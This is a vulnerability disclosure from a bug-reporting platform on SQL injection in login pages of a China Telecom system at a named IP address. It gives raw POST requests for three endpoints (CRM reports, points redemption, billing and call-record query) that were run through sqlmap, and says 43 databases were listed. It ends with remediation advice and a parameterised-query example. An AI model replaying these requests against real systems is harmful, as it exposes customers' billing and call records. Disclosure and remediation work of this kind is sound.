A collection of SQL injections in a China Telecom system

2014-10-16 19:11

http://202.98.116.80/crmrpt/login.aspx

Then I ran sqlmap against it right away.

POST request:

POST /crmrpt/login.aspx HTTP/1.1
Host: 202.98.116.80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.98.116.80/crmrpt/login.aspx
Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

__VIEWSTATE=dDwtNjAwMjg5NTQzOzs%2Bw%2BWZccNnWuUBcDGfRVXIbvr5SKA%3D&TextBoxPass=admin&TextBoxUsr=admin&ButtonLogin=%E7%99%BB%E5%BD%95

available databases [43]:

Proof of vulnerability:

This is probably on the OA network or the 97 network; otherwise, why would there be no filtering?

http://202.98.116.80/jifen/login.aspx (points redemption system)

POST request:

POST /jifen/login.aspx HTTP/1.1
Host: 202.98.116.80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.98.116.80/jifen/login.aspx
Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

__VIEWSTATE=dDwtMzc1MTI5NDQ5Ozs%2B9Gax3NXBFtaiGW5D6Zkb0MhNsz4%3D&TextBoxPwd=111111111&TextBoxUsr=111111111&ButtonLogin=%E7%99%BB%E5%BD%95

http://202.98.116.80/qd/login.aspx (billing and call detail record query)

POST request:

POST /qd/login.aspx HTTP/1.1
Host: 202.98.116.80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.98.116.80/qd/login.aspx
Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

__VIEWSTATE=dDwtMTUyMTI0NTcxMTs7PsbU0cV6c7TeZDHUxCOtWnV4AZ%2Bu&TextBoxPwd=0000000000&TextBoxStaff=000000000&Button1=%E7%99%BB%E5%BD%95

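Remediation:

Filter the input. If this OA network system can also be reached from the external network, proper security measures need to be in place.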
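As an added example (not part of the original report and not the affected system's code), the login check below binds the form values as query parameters instead of concatenating them into SQL text. It assumes an in-memory SQLite database as a stand-in for the real backend and a hypothetical `staff` table; only the form field names `TextBoxUsr` and `TextBoxPass` come from the request shown in the report.

```python
import hashlib
import hmac
import os
import sqlite3
from urllib.parse import parse_qs

def _hash(password, salt):
    # Salted PBKDF2 so the table never holds plaintext passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed sample data; schema and accounts are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE staff (usr TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    for usr, pw in [("admin", "S3cure-pass"), ("o'brien", "An0ther-pass")]:
        salt = os.urandom(16)
        db.execute("INSERT INTO staff VALUES (?, ?, ?)", (usr, salt, _hash(pw, salt)))
    return db

def login_concat(db, usr):
    """Unfiltered pattern: the form value becomes part of the SQL text."""
    return db.execute("SELECT usr FROM staff WHERE usr = '" + usr + "'").fetchone()

def concat_breaks_on_quote(db):
    """A legitimate name with an apostrophe already corrupts the statement,
    which is the tell-tale sign that input is being parsed as SQL."""
    try:
        login_concat(db, "o'brien")
    except sqlite3.OperationalError:
        return True
    return False

def login_bound(db, body):
    """Hardened: parse the POST body, bind the user name, verify the hash in code."""
    form = parse_qs(body, keep_blank_values=True)
    usr = form.get("TextBoxUsr", [""])[0]
    pw = form.get("TextBoxPass", [""])[0]
    row = db.execute("SELECT salt, pw_hash FROM staff WHERE usr = ?", (usr,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison; the password never reaches the SQL layer.
    return hmac.compare_digest(_hash(pw, row[0]), row[1])

if __name__ == "__main__":
    db = make_db()
    print("concatenated query breaks on a quote:", concat_breaks_on_quote(db))
    print("bound login:", login_bound(db, "TextBoxPass=An0ther-pass&TextBoxUsr=o%27brien"))
```

With bound parameters the driver sends the value separately from the statement, so no character filtering is needed for the query to stay intact.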

Source: www.wooyun.org/bugs/wooyun-2014-074484
